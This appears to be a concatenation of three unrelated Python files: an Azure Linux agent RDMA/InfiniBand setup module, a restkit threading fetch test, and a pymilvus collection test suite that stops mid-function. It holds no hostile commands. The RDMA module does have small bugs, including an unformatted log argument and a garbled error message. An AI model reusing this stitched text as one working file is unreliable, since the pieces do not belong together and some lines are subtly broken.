# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Handle packages and modules to enable RDMA for IB networking
"""
import os
import re
import time
import threading
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
import azurelinuxagent.common.utils.fileutil as fileutil
import azurelinuxagent.common.utils.shellutil as shellutil
from azurelinuxagent.common.utils.textutil import parse_doc, find, getattrib
from azurelinuxagent.common.protocol.wire import SHARED_CONF_FILE_NAME
dapl_config_paths = [
'/etc/dat.conf',
'/etc/rdma/dat.conf',
'/usr/local/etc/dat.conf'
]
def setup_rdma_device(nd_version):
logger.verbose("Parsing SharedConfig XML contents for RDMA details")
xml_doc = parse_doc(
fileutil.read_file(os.path.join(conf.get_lib_dir(), SHARED_CONF_FILE_NAME)))
if xml_doc is None:
logger.error("Could not parse SharedConfig XML document")
return
instance_elem = find(xml_doc, "Instance")
if not instance_elem:
logger.error("Could not find <Instance> in SharedConfig document")
return
rdma_ipv4_addr = getattrib(instance_elem, "rdmaIPv4Address")
if not rdma_ipv4_addr:
logger.error(
"Could not find rdmaIPv4Address attribute on Instance element of SharedConfig.xml document")
return
rdma_mac_addr = getattrib(instance_elem, "rdmaMacAddress")
if not rdma_mac_addr:
logger.error(
"Could not find rdmaMacAddress attribute on Instance element of SharedConfig.xml document")
return
# add colons to the MAC address (e.g. 00155D33FF1D ->
# 00:15:5D:33:FF:1D)
rdma_mac_addr = ':'.join([rdma_mac_addr[i:i+2]
for i in range(0, len(rdma_mac_addr), 2)])
logger.info("Found RDMA details. IPv4={0} MAC={1}".format(
rdma_ipv4_addr, rdma_mac_addr))
# Set up the RDMA device with collected informatino
RDMADeviceHandler(rdma_ipv4_addr, rdma_mac_addr, nd_version).start()
logger.info("RDMA: device is set up")
return
class RDMAHandler(object):
driver_module_name = 'hv_network_direct'
nd_version = None
def get_rdma_version(self):
"""Retrieve the firmware version information from the system.
This depends on information provided by the Linux kernel."""
if self.nd_version :
return self.nd_version
kvp_key_size = 512
kvp_value_size = 2048
driver_info_source = '/var/lib/hyperv/.kvp_pool_0'
base_kernel_err_msg = 'Kernel does not provide the necessary '
base_kernel_err_msg += 'information or the kvp daemon is not running.'
if not os.path.isfile(driver_info_source):
error_msg = 'RDMA: Source file "%s" does not exist. '
error_msg += base_kernel_err_msg
logger.error(error_msg % driver_info_source)
return
f = open(driver_info_source)
while True :
key = f.read(kvp_key_size)
value = f.read(kvp_value_size)
if key and value :
key_0 = key.split("\x00")[0]
value_0 = value.split("\x00")[0]
if key_0 == "NdDriverVersion" :
f.close()
self.nd_version = value_0
return self.nd_version
else :
break
f.close()
error_msg = 'RDMA: NdDriverVersion not found in "%s"'
logger.error(error_msg % driver_info_source)
return
@staticmethod
def is_kvp_daemon_running():
"""Look for kvp daemon names in ps -ef output and return True/False
"""
# for centos, the hypervkvpd and the hv_kvp_daemon both are ok.
# for suse, it uses hv_kvp_daemon
kvp_daemon_names = ['hypervkvpd', 'hv_kvp_daemon']
exitcode, ps_out = shellutil.run_get_output("ps -ef")
if exitcode != 0:
raise Exception('RDMA: ps -ef failed: %s' % ps_out)
for n in kvp_daemon_names:
if n in ps_out:
logger.info('RDMA: kvp daemon (%s) is running' % n)
return True
else:
logger.verbose('RDMA: kvp daemon (%s) is not running' % n)
return False
def load_driver_module(self):
"""Load the kernel driver, this depends on the proper driver
to be installed with the install_driver() method"""
logger.info("RDMA: probing module '%s'" % self.driver_module_name)
result = shellutil.run('modprobe --first-time %s' % self.driver_module_name)
if result != 0:
error_msg = 'Could not load "%s" kernel module. '
error_msg += 'Run "modprobe --first-time %s" as root for more details'
logger.error(
error_msg % (self.driver_module_name, self.driver_module_name)
)
return False
logger.info('RDMA: Loaded the kernel driver successfully.')
return True
def install_driver_if_needed(self):
if self.nd_version:
self.install_driver()
else:
logger.info('RDMA: skip installing driver when ndversion not present\n')
def install_driver(self):
"""Install the driver. This is distribution specific and must
be overwritten in the child implementation."""
logger.error('RDMAHandler.install_driver not implemented')
def is_driver_loaded(self):
"""Check if the network module is loaded in kernel space"""
cmd = 'lsmod | grep ^%s' % self.driver_module_name
status, loaded_modules = shellutil.run_get_output(cmd)
logger.info('RDMA: Checking if the module loaded.')
if loaded_modules:
logger.info('RDMA: module loaded.')
return True
logger.info('RDMA: module not loaded.')
return False
def reboot_system(self):
"""Reboot the system. This is required as the kernel module for
the rdma driver cannot be unloaded with rmmod"""
logger.info('RDMA: Rebooting system.')
ret = shellutil.run('shutdown -r now')
if ret != 0:
logger.error('RDMA: Failed to reboot the system')
dapl_config_paths = [
'/etc/dat.conf', '/etc/rdma/dat.conf', '/usr/local/etc/dat.conf']
class RDMADeviceHandler(object):
"""
Responsible for writing RDMA IP and MAC address to the /dev/hvnd_rdma
interface.
"""
rdma_dev = '/dev/hvnd_rdma'
sriov_dir = '/sys/class/infiniband'
device_check_timeout_sec = 120
device_check_interval_sec = 1
ipoib_check_timeout_sec = 60
ipoib_check_interval_sec = 1
ipv4_addr = None
mac_adr = None
nd_version = None
def __init__(self, ipv4_addr, mac_addr, nd_version):
self.ipv4_addr = ipv4_addr
self.mac_addr = mac_addr
self.nd_version = nd_version
def start(self):
"""
Start a thread in the background to process the RDMA tasks and returns.
"""
logger.info("RDMA: starting device processing in the background.")
threading.Thread(target=self.process).start()
def process(self):
try:
if not self.nd_version :
logger.info("RDMA: provisioning SRIOV RDMA device.")
self.provision_sriov_rdma()
else :
logger.info("RDMA: provisioning Network Direct RDMA device.")
self.provision_network_direct_rdma()
except Exception as e:
logger.error("RDMA: device processing failed: {0}".format(e))
def provision_network_direct_rdma(self) :
RDMADeviceHandler.update_dat_conf(dapl_config_paths, self.ipv4_addr)
skip_rdma_device = False
module_name = "hv_network_direct"
retcode,out = shellutil.run_get_output("modprobe -R %s" % module_name, chk_err=False)
if retcode == 0:
module_name = out.strip()
else:
logger.info("RDMA: failed to resolve module name. Use original name")
retcode,out = shellutil.run_get_output("modprobe %s" % module_name)
if retcode != 0:
logger.error("RDMA: failed to load module %s" % module_name)
return
retcode,out = shellutil.run_get_output("modinfo %s" % module_name)
if retcode == 0:
version = re.search("version:\s+(\d+)\.(\d+)\.(\d+)\D", out, re.IGNORECASE)
if version:
v1 = int(version.groups(0)[0])
v2 = int(version.groups(0)[1])
if v1>4 or v1==4 and v2>0:
logger.info("Skip setting /dev/hvnd_rdma on 4.1 or later")
skip_rdma_device = True
else:
logger.info("RDMA: hv_network_direct driver version not present, assuming 4.0.x or older.")
else:
logger.warn("RDMA: failed to get module info on hv_network_direct.")
if not skip_rdma_device:
RDMADeviceHandler.wait_rdma_device(
self.rdma_dev, self.device_check_timeout_sec, self.device_check_interval_sec)
RDMADeviceHandler.write_rdma_config_to_device(
self.rdma_dev, self.ipv4_addr, self.mac_addr)
RDMADeviceHandler.update_network_interface(self.mac_addr, self.ipv4_addr)
def provision_sriov_rdma(self) :
RDMADeviceHandler.wait_any_rdma_device(
self.sriov_dir, self.device_check_timeout_sec, self.device_check_interval_sec)
RDMADeviceHandler.update_iboip_interface(self.ipv4_addr, self.ipoib_check_timeout_sec, self.ipoib_check_interval_sec)
return
@staticmethod
def update_iboip_interface(ipv4_addr, timeout_sec, check_interval_sec) :
logger.info("Wait for ib0 become available")
total_retries = timeout_sec/check_interval_sec
n = 0
found_ib0 = None
while not found_ib0 and n < total_retries:
ret, output = shellutil.run_get_output("ifconfig -a")
if ret != 0:
raise Exception("Failed to list network interfaces")
found_ib0 = re.search("ib0", output, re.IGNORECASE)
if found_ib0:
break
time.sleep(check_interval_sec)
n += 1
if not found_ib0:
raise Exception("ib0 is not available")
netmask = 16
logger.info("RDMA: configuring IPv4 addr and netmask on ipoib interface")
addr = '{0}/{1}'.format(ipv4_addr, netmask)
if shellutil.run("ifconfig ib0 {0}".format(addr)) != 0:
raise Exception("Could set addr to {0} on ib0".format(addr))
logger.info("RDMA: ipoib address and netmask configured on interface")
@staticmethod
def update_dat_conf(paths, ipv4_addr):
"""
Looks at paths for dat.conf file and updates the ip address for the
infiniband interface.
"""
logger.info("Updating DAPL configuration file")
for f in paths:
logger.info("RDMA: trying {0}".format(f))
if not os.path.isfile(f):
logger.info(
"RDMA: DAPL config not found at {0}".format(f))
continue
logger.info("RDMA: DAPL config is at: {0}".format(f))
cfg = fileutil.read_file(f)
new_cfg = RDMADeviceHandler.replace_dat_conf_contents(
cfg, ipv4_addr)
fileutil.write_file(f, new_cfg)
logger.info("RDMA: DAPL configuration is updated")
return
raise Exception("RDMA: DAPL configuration file not found at predefined paths")
@staticmethod
def replace_dat_conf_contents(cfg, ipv4_addr):
old = "ofa-v2-ib0 u2.0 nonthreadsafe default libdaplofa.so.2 dapl.2.0 \"\S+ 0\""
new = "ofa-v2-ib0 u2.0 nonthreadsafe default libdaplofa.so.2 dapl.2.0 \"{0} 0\"".format(
ipv4_addr)
return re.sub(old, new, cfg)
@staticmethod
def write_rdma_config_to_device(path, ipv4_addr, mac_addr):
data = RDMADeviceHandler.generate_rdma_config(ipv4_addr, mac_addr)
logger.info(
"RDMA: Updating device with configuration: {0}".format(data))
with open(path, "w") as f:
logger.info("RDMA: Device opened for writing")
f.write(data)
logger.info("RDMA: Updated device with IPv4/MAC addr successfully")
@staticmethod
def generate_rdma_config(ipv4_addr, mac_addr):
return 'rdmaMacAddress="{0}" rdmaIPv4Address="{1}"'.format(mac_addr, ipv4_addr)
@staticmethod
def wait_rdma_device(path, timeout_sec, check_interval_sec):
logger.info("RDMA: waiting for device={0} timeout={1}s".format(path, timeout_sec))
total_retries = timeout_sec/check_interval_sec
n = 0
while n < total_retries:
if os.path.exists(path):
logger.info("RDMA: device ready")
return
logger.verbose(
"RDMA: device not ready, sleep {0}s".format(check_interval_sec))
time.sleep(check_interval_sec)
n += 1
logger.error("RDMA device wait timed out")
raise Exception("The device did not show up in {0} seconds ({1} retries)".format(
timeout_sec, total_retries))
@staticmethod
def wait_any_rdma_device(dir, timeout_sec, check_interval_sec):
logger.info(
"RDMA: waiting for any Infiniband device at directory={0} timeout={1}s".format(
dir, timeout_sec))
total_retries = timeout_sec/check_interval_sec
n = 0
while n < total_retries:
r = os.listdir(dir)
if r:
logger.info("RDMA: device found in {0}".format(dir))
return
logger.verbose(
"RDMA: device not ready, sleep {0}s".format(check_interval_sec))
time.sleep(check_interval_sec)
n += 1
logger.error("RDMA device wait timed out")
raise Exception("The device did not show up in {0} seconds ({1} retries)".format(
timeout_sec, total_retries))
@staticmethod
def update_network_interface(mac_addr, ipv4_addr):
netmask=16
logger.info("RDMA: will update the network interface with IPv4/MAC")
if_name=RDMADeviceHandler.get_interface_by_mac(mac_addr)
logger.info("RDMA: network interface found: {0}", if_name)
logger.info("RDMA: bringing network interface up")
if shellutil.run("ifconfig {0} up".format(if_name)) != 0:
raise Exception("Could not bring up RMDA interface: {0}".format(if_name))
logger.info("RDMA: configuring IPv4 addr and netmask on interface")
addr = '{0}/{1}'.format(ipv4_addr, netmask)
if shellutil.run("ifconfig {0} {1}".format(if_name, addr)) != 0:
raise Exception("Could set addr to {1} on {0}".format(if_name, addr))
logger.info("RDMA: network address and netmask configured on interface")
@staticmethod
def get_interface_by_mac(mac):
ret, output = shellutil.run_get_output("ifconfig -a")
if ret != 0:
raise Exception("Failed to list network interfaces")
output = output.replace('\n', '')
match = re.search(r"(eth\d).*(HWaddr|ether) {0}".format(mac),
output, re.IGNORECASE)
if match is None:
raise Exception("Failed to get ifname with mac: {0}".format(mac))
output = match.group(0)
eths = re.findall(r"eth\d", output)
if eths is None or len(eths) == 0:
raise Exception("ifname with mac: {0} not found".format(mac))
return eths[-1]
|
test_threads.py
|
import threading
import timeit
from restkit import *
#set_logging("debug")
urls = [
"http://yahoo.fr",
"http://google.com",
"http://friendpaste.com",
"http://benoitc.io",
"http://couchdb.apache.org"]
allurls = []
for i in range(10):
allurls.extend(urls)
def fetch(u):
r = request(u, follow_redirect=True)
print "RESULT: %s: %s (%s)" % (u, r.status, len(r.body_string()))
def spawn(u):
t = threading.Thread(target=fetch, args=[u])
t.daemon = True
t.start()
return t
def extract():
threads = [spawn(u) for u in allurls]
[t.join() for t in threads]
t = timeit.Timer(stmt=extract)
print "%.2f s" % t.timeit(number=1)
|
test_collection.py
|
import numpy
import pandas as pd
import pytest
from pymilvus import DataType
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common import constants as cons
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": default_top_k, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
if request.param is None:
pytest.skip("None schema is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
if isinstance(request.param, list):
pytest.skip("list is valid fields")
yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
if request.param.dtype == DataType.INT64:
pytest.skip("int64 type is valid primary key")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
if request.param == 1:
pytest.skip("1 is valid dim")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
"""
target: test collection with default schema
method: create collection with default schema
expected: assert collection property
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
exp_primary: ct.default_int64_field_name})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_empty_name(self):
"""
target: test collection with empty name
method: create collection with a empty name
expected: raise exception
"""
self._connect()
c_name = ""
error = {ct.err_code: 1, ct.err_msg: f'`collection_name` value is illegal'}
self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
"""
target: test collection with illegal name
method: create collection with illegal name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
"""
target: test collection with invalid name
method: create collection with invalid name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
"""
target: test collection with dup name
method: create collection with dup name and none schema and data
expected: collection properties consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(collection_w.name)
assert collection_w.name == self.collection_wrap.name
assert collection_w.schema == self.collection_wrap.schema
assert collection_w.num_entities == self.collection_wrap.num_entities
assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_with_desc(self):
"""
target: test collection with dup name
method: 1. default schema with desc 2. dup name collection
expected: desc consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
self.collection_wrap.init_collection(c_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
"""
target: test collection with dup name and new schema
method: 1.create collection with default schema
2. collection with dup name and new schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
fields = [cf.gen_int64_field(is_primary=True)]
schema = cf.gen_collection_schema(fields=fields)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_primary(self):
"""
target: test collection with dup name and new primary_field schema
method: 1.collection with default schema
2. collection with same fields and new primary_field schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field()
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema,
exp_primary: int_field_one.name})
new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
check_items=error)
assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
"""
target: test collection with dup name and new dim schema
method: 1. default schema 2. schema with new dim
expected: raise exception
"""
self._connect()
new_dim = 120
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
schema = cf.gen_default_collection_schema()
new_fields = cf.gen_float_vec_field(dim=new_dim)
schema.fields[-1] = new_fields
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
dim = collection_w.schema.fields[-1].params['dim']
assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
"""
target: test collection with dup name and invalid schema
method: 1. default schema 2. invalid schema
expected: raise exception and
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
schema = get_none_removed_invalid_strings
self.collection_wrap.init_collection(collection_w.name, schema=schema,
check_task=CheckTasks.err_res, check_items=error)
assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
"""
target: test collection with dup name and same schema
method: dup name and same schema
expected: two collection object is available
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_none_schema(self):
"""
target: test collection with none schema
method: create collection with none schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
"""
target: test collection with invalid schema
method: create collection with non-CollectionSchema type schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
"""
target: test collection with invalid fields type, non-list
method: create collection schema with non-list invalid fields
expected: exception
"""
self._connect()
fields = get_invalid_type_fields
error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
self.collection_schema_wrap.init_collection_schema(fields=fields,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_with_unknown_type(self):
"""
target: test collection with unknown type
method: create with DataType.UNKNOWN
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_none_field_name(self):
"""
target: test field schema with None name
method: None field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
"""
target: test collection with invalid field type
method: invalid DataType
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_field_dtype_float_value(self):
"""
target: test collection with float type
method: create field with float type
expected:
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_empty_fields(self):
"""
target: test collection with empty fields
method: create collection with fields = []
expected: exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
"""
target: test collection with dup field name
method: Two FieldSchema have same name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
"""
target: test collection just with vec field
method: create with float-vec fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_float_vectors(self):
"""
target: test collection with multi float vectors
method: create collection with two float-vec fields
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_float_vec_field(name="tmp")]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_mix_vectors(self):
"""
target: test collection with mix vectors
method: create with float and binary vec
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
"""
target: test collection without vectors
method: create collection only with int field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
"""
target: test collection without primary field
method: no primary field specified in collection schema and fields
expected: raise exception
"""
self._connect()
int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_is_primary_false(self):
"""
target: test collection with all is_primary false
method: set all fields if_primary false
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
cf.gen_float_vec_field(is_primary=False)]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
"""
target: test collection with invalid primary
method: define field with is_primary=non-bool
expected: raise exception
"""
self._connect()
name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
"""
target: test collection with invalid primary_field
method: specify invalid string primary_field in collection schema
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_non_string_primary_field(self, primary_field):
"""
target: test collection with non-string primary_field
method: primary_field type is not string
expected: raise exception
"""
self._connect()
